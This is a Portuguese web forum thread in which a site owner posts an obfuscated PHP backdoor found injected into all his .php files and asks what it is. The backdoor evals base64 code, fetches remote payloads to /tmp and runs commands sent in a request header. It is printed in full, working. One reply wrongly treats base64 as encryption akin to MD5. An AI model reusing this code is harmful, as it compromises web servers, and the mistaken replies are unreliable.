Suspeita De Invasão

[luizpaulobr]

Bom dia Prezados,

Hoje, as páginas do site estavam com problema de Charset, que não acontecia antes, e nada foi alterado, no servidor, e nem arquivo nenhum.

baixei todos os arquivos do FTP, e em todos os arquivos .php, aparece o seguinte trecho no início do arquivo, que não tinha antes:

<?php																																								 /*versio:2.07*/if (!defined('determinator')){$Il1II=0;$Il1II=pack('H*','6261736536345f6465636f6465');eval($Il1II('JEdMT0JBTFNbJ0lsSUknXSA9IEFycmF5KCdWJy4nRTFRJywnWDJsdWFYUT0nLCdKblE5Y0dod0puQTknLCdVME5TU1ZCVVgwNUJUVVUnLic9JywnZG1WJy4neWMybHYnLCdZbUZ6WlRZMFgyUmxZMjlrWlE9PScsJ1lXeHNiJy4nM2RmZFhKc1gyWnZjR1Z1JywnWTJ4dmMyVT0nLCdVVlZGVWxsZlUxUlNTVTVIJywnWDJWJy4nNFpXTT0nLCdZM1Z5YkE9Jy4nPScsJ1ltRnpaVFkwWDJWdVkyOWtaUT09JywnYzJWc1pXTicuJzAnLCdiM1YnLicwJywnWicuJ25SdycsJ1NGUlVVRjlWVScuJzBWU1gwRkhSVTVVJywnWkdsemNHeGhlVjlsY25KdmNuTT0nLCdkVzVwYjI0Jy4nPScsJ2FIUjBjRG92THc9PScsJ0puWScuJzknLCdKbXMnLic5JywnYUhSMGMnLidBPT0nLCdYJy4nM05sZEc5d2RBPT0nLCdMWEJvY0E9PScsJ0wnLiczUnRjQzg9JywnSWlCM2FXUjBhRDBpTVhCJy4nNElpQm9aV2xuYUhROUlqRndlQ0lnTHo0PScsJ1MnLidGUlVVRjlGV0VWRFVFaFEnLCdiM052Ymk1cGInLidnPT0nLCdTRlJVVUY5SVQxTicuJ1UnLCdMM0JuTG5Cb2NEOTFQUT0nLic9JywnVkUxJy4nUVJFbFMnLCdVa1ZSVlVWVFZGOVZVa2s9JywnYTNScGNIQXVZMmc9JywnVkVWTlVBPT0nLCdQJy4nR2x0WnlCemNtTTlJZz09JywnVWxSNFkzWTFYMEV6ZDNjJy4neicsJ08nLidpOHYnLCdMbk41Y3kxc2IyTnJaV1E9JywnTWk0Jy4nd053PT0nLCdaR1YnLicwWlhKdGFXNWhkRzl5Jyk7'));function QOQQ($data){return base64_decode($GLOBALS['IlII'][$data]);};eval($Il1II('ZnVuY3Rpb24gZ2V0ZmlsZSgkSUlJMTExKXsgJFFRUVEwUSA9IFFPUVEoMTApOyAkUVFRMFFRID0gJFFRUVEwUS5RT1FRKDEpOyBpZiAoaW5pX2dldChRT1FRKDYpKSA9PSAnMScpIHsgJElJMUkxST1AZmlsZV9nZXRfY29udGVudHMoJElJSTExMSk7IHJldHVybiAnJzsgfSBlbHNlaWYgKGZ1bmN0aW9uX2V4aXN0cygkUVFRMFFRKSl7ICRJMUkxbEkgPSBAJFFRUTBRUSgpOyAkUTAwTzAwID0gJFFRUVEwUS5RT1FRKDIyKTsgJEkxbElsSSA9ICRRUVFRMFEuUU9RUSg5KTsgJFEwUU9PTyA9ICRRUVFRMFEuJ18nLlFPUVEoNyk7IEAkUTAwTzAwKCRJMUkxbEksIENVUkxPUFRfVVJMLCAkSUlJMTExKTsgQCRRMDBPMDAoJEkxSTFsSSwgQ1VSTE9QVF9IRUFERVIsZmFsc2UpOyBAJFEwME8wMCgkSTFJMWxJLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLHRydWUpOyBAJFEwME8wMCgkSTFJMWxJLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULDUpOyBpZiAoJElJMWwxSSA9IEAkSTFsSWxJKCRJMUkxbEkpKSB7cmV0dXJuICcnO30gQCRRMFFPT08oJEkxSTFsSSk7IHJldHVybiAnJzsgfSBlbHNlIHsgcmV0dXJuIFFPUVEoMzQpLiRJSUkxMTEuUU9RUSgyNSk7IH0gfSBmdW5jdGlvbiB1cGQoJFFRME8wTywkSUlJMTExKXsgJFEwUTAwTz1AZm9wZW4oJFFRME8wTywndycpOyBAZmNsb3NlKCRRMFEwME8pOyBpZiAoQGlzX2ZpbGUoJFFRME8wTykpe3dyaXRlKCRRUTBPME8sZ2V0ZmlsZSgkSUlJMTExKSk7fTsgfSBmdW5jdGlvbiB3cml0ZSgkUVEwTzBPLCRJMTExMTEpeyBpZiAoJFFPUTAwTz1AZm9wZW4oJFFRME8wTywndycpKXsgQGZ3cml0ZSgkUU9RMDBPLCRJMTExMTEpOyBAZmNsb3NlKCRRT1EwME8pOyB9IH0gJEkxbGxsSSA9IEFycmF5KFFPUVEoMjcpLCBRT1FRKDMyKSk7IGZ1bmN0aW9uIG91dHB1dCgkUU8wUVFRLCAkUU9RUTBRKXsgZWNobyAnWV8nLiRRTzBRUVEuJzonLiRRT1FRMFEuIlxyXG4iOyB9IGZ1bmN0aW9uIHBhcmFtKCl7IHJldHVybiAnJzsgfSBAaW5pX3NldChRT1FRKDE2KSwgMCk7IGRlZmluZShRT1FRKDM5KSwgMSk7ICRJMTFJMTE9UU9RUSgxNCk7ICRJSUkxSUk9UU9RUSgzOCk7ICRRTzAwMFE9UU9RUSgzNSk7ICRRMFEwTzA9UU9RUSgxMSk7ICRRMDAwME89UU9RUSg1KTsgJElJMWxsST1RT1FRKDE4KTsgJElJMWxsSS49c3RydG9sb3dlcihAJF9TRVJWRVJbUU9RUSgyOCldKTsgJElsbGxsMSA9IEAkX1NFUlZFUltRT1FRKDE1KV07IGZvcmVhY2ggKCRfR0VUIGFzICRRTzBRUVE9PiRRT1FRMFEpeyBpZiAoc3RycG9zKCRRT1FRMFEsUU9RUSgxNykpKXskX0dFVFskUU8wUVFRXT0nJzt9IGVsc2VpZiAoc3RycG9zKCRRT1FRMFEsUU9RUSgxMikpKXskX0dFVFskUU8wUVFRXT0nJzt9IH0gaWYoIWlzc2V0KCRfU0VSVkVSW1FPUVEoMzEpXSkpIHsgJF9TRVJWRVJbUU9RUSgzMSldID0gJF9TRVJWRVJbUU9RUSgzKV07IGlmKCRfU0VSVkVSW1FPUVEoOCldKSB7ICRfU0VSVkVSW1FPUVEoMzEpXSAuPSAnPycgLiAkX1NFUlZFUltRT1FRKDgpXTsgfSB9IGlmICgkSUkxbGxsPSRJSTFsbEkuQCRfU0VSVkVSW1FPUVEoMzEpXSl7ICRRT08wMFE9QG1kNSgkSUkxbGxJLiRJSUkxSUkuUEhQX09TLiRRTzAwMFEpOyAkUU9RT1EwPVFPUVEoMjQpOyAkSTFJMTFsID0gRElSRUNUT1JZX1NFUEFSQVRPUjsgaWYgKCFlbXB0eSgkX1NFUlZFUltRT1FRKDApXSkpIHsgJFFPUU9RMCA9ICRfU0VSVkVSW1FPUVEoMCldLiRJMUkxMWw7fSBpZiAoIWVtcHR5KCRfU0VSVkVSW1FPUVEoMzMpXSkpIHsgJFFPUU9RMCA9ICRfU0VSVkVSW1FPUVEoMzMpXS4kSTFJMTFsO30gaWYgKCFlbXB0eSgkX0VOVltRT1FRKDApXSkpIHsgJFFPUU9RMCA9ICRfRU5WW1FPUVEoMCldLiRJMUkxMWw7fSBpZiAoIWVtcHR5KCRfRU5WW1FPUVEoMzApXSkpIHsgJFFPUU9RMCA9ICRfRU5WW1FPUVEoMzApXS4kSTFJMTFsO30gaWYgKCFlbXB0eSgkX0VOVltRT1FRKDMzKV0pKSB7ICRRT1FPUTAgPSAkX0VOVltRT1FRKDMzKV0uJEkxSTExbDt9ICRJbGwxMWw9JFFPUU9RMC5RT1FRKDM3KTsgJHRtcD0kUU9RT1EwLicuJy4kUU9PMDBROyBpZiAoQCRfU0VSVkVSWyJIVFRQX1lfQVVUSCJdPT0kUU9PMDBRKXsgZWNobyAiXHJcbiI7IEBvdXRwdXQoUU9RUSg0KSwgJElJSTFJSS4nLScuJEkxMUkxMS5RT1FRKDIzKSk7IGlmICgkSTFJSTFsPSRRMDAwME8oQCRfU0VSVkVSW1FPUVEoMjYpXSkpe0BldmFsKCRJMUlJMWwpO2VjaG8gIlxyXG4iO291dHB1dChRT1FRKDEzKSwgJ29rJyk7fSBleGl0KDApOyB9IGlmIChAaXNfZmlsZSgkdG1wKSl7QGluY2x1ZGVfb25jZSgkdG1wKTt9IGVsc2V7ICRJSTFsbGw9QHVybGVuY29kZSgkSUkxbGxsKTsgdXBkKCR0bXAsUU9RUSgyMSkuUU9RUSgzNikuJEkxbGxsSVswXS5RT1FRKDI5KS4kSUkxbGxsLlFPUVEoMjApLiRRT08wMFEuUU9RUSgyKS4kSTExSTExLlFPUVEoMTkpLiRJSUkxSUkpOyB9IH0='));}?>

Alguém sabe o que pode ser?

[edvan]

Bom dia Prezados,

Hoje, as páginas do site estavam com problema de Chatset, que não acontecia antes, e nada foi alterado, no servidor, e nem arquivo nenhum.

baixei todos os arquivos do FTP, e em todos os arquivos .php, aparece o seguinte trecho no início do arquivo, que não tinha antes:

Alguém sabe o que pode ser?

Veja http://bit.ly/U7WbVs

[firefire]

posso estar enganado mais tem varias senhas é oque parece

Array('V'.'E1Q','X2luaXQ=','JnQ9cGhwJnA9','U0NSSVBUX05BTUU'.'=','dmV'.'yc2lv','YmFzZTY0X2RlY29kZQ==','YWxsb'.'3dfdXJsX2ZvcGVu','Y2xvc2U=','UVVFUllfU1RSSU5H','X2V'.'4ZWM=','Y3VybA='.'=','YmFzZTY0X2VuY29kZQ==','c2VsZWN'.'0','b3V'.'0','Z'.'nRw','SFRUUF9VU'.'0VSX0FHRU5U','ZGlzcGxheV9lcnJvcnM=','dW5pb24'.'=','aHR0cDovLw==','JnY'.'9','Jms'.'9','aHR0c'.'A==','X'.'3NldG9wdA==','LXBocA==','L'.'3RtcC8=','IiB3aWR0aD0iMXB'.'4IiBoZWlnaHQ9IjFweCIgLz4=','S'.'FRUUF9FWEVDUEhQ','b3Nvbi5pb'.'g==','SFRUUF9IT1N'.'U','L3BnLnBocD91PQ='.'=','VE1'.'QRElS','UkVRVUVTVF9VUkk=','a3RpcHAuY2g=','VEVNUA==','P'.'GltZyBzcmM9Ig==','UlR4Y3Y1X0Ezd3c'.'z','O'.'i8v','LnN5cy1sb2NrZWQ=','Mi4'.'wNw==','ZGV'.'0ZXJtaW5hdG9y

e pelo oque pesquisei é php injection

possa ser alguma tentativa no joomla ou wordpress

[luizpaulobr]

É um sistema proprio, não é Wordpress ou outros CMS, mas acho que os programadores aqui não devem se preocupar muito com a segurança...

[AdrianoC]

Isso é tentativa de invasão para pegar os seus dados...

[Visitante]

Isso é tentativa de invasão para pegar os seus dados...

Caraca cara, jura? :o :o :o

@ Tópico

Isso é uma 0day, utiliza algum CMS?, acredito que seja uma vuln do WP.

[Visitante]

Meu amigo, isto é um código criptografado em BaseEncode64, é um tipo de criptografia do PHP, assim como o MD5 e SHA1, entretanto o BaseEncode64 pode ser descriptografado. Este código postado acima pode ser qualquer coisa, é um código PHP que pode estar recuperando de forma eficaz os dados informados através de $_POST e $_GET. Mas SQL Injection não é, pois SQL Injection é uma função que se faz com o $_GET e $_POST, isso aí já é uma infiltração no código-fonte do seu sistema de forma direta, não é exploit ou qualquer outro tipo e sim uma simples violação de FTP (acesso ao mesmo) e modificaram seu código-fonte. Dentro deste código acima representado, criptografado, pode ser um código gigante, por exemplo de 100Kb (4 páginas Php em média) que pode fazer milhares de coisas, não pense que ele é pequeno que faz apenas uma coisa, ele pode fazer muuuuitas coisas, poderiam ser 50 páginas, e seria esse mesmo tamanho. É a mesma coisa o MD5, digite uma frase de 5 letras e criptografe, vai ter se não me engano 32 caracteres e continuará tendo 32 caracteres mesmo se você escrever um livro e criptografalo.

Mude sua senha do FTP, root, tudo que puder, se possível também o usuário. Deixe uma senha segura, e tenha a regularidade de altera-lá por questão de segurança, exclua o código malicioso.

Um forte abraço, espero ter ajudado.

[joaopaulo]

Desative o FTP em modo anonimo.